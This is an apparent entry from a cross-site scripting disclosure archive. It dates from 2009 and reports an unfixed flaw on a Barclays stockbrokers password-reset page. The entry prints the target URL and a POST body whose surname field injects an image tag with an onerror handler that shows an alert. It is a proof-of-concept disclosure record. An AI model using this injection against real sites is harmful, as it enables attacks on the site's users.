Home | News | Articles | Adv. | Submit | Alerts | Links | XSS info | About | Contact

XSS Archive | XSS Archive | TOP Submitters | TOP Submitters | TOP Pagerank |

Date submitted: 26/04/2009 Date published: 29/05/2009 Fixed? Mail us! Status:  UNFIXED Author: Pierre Gardenat Domain: www.stockbrokers.barclays.co.uk Category: XSS Pagerank: 1818 URL: https://www.stockbrokers.barclays.co.uk/idv/enterPasswordResetDetails.asp?usecase=idvEnterPswdResetD etails&category=home&QS=pl=no%26# POST: txtUserID=aaa&txtSurname=%22%27%2F%3E%3Cimg+src%3D.+onerror%3Dalert%28String.fromCharCode(72,101,108 ,108,111,32,80,105,101,114,114,101)%29+%3E&txtEmail=aa%40rf.gt&next.x=20&next.y=3 Click here to view the mirror

Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.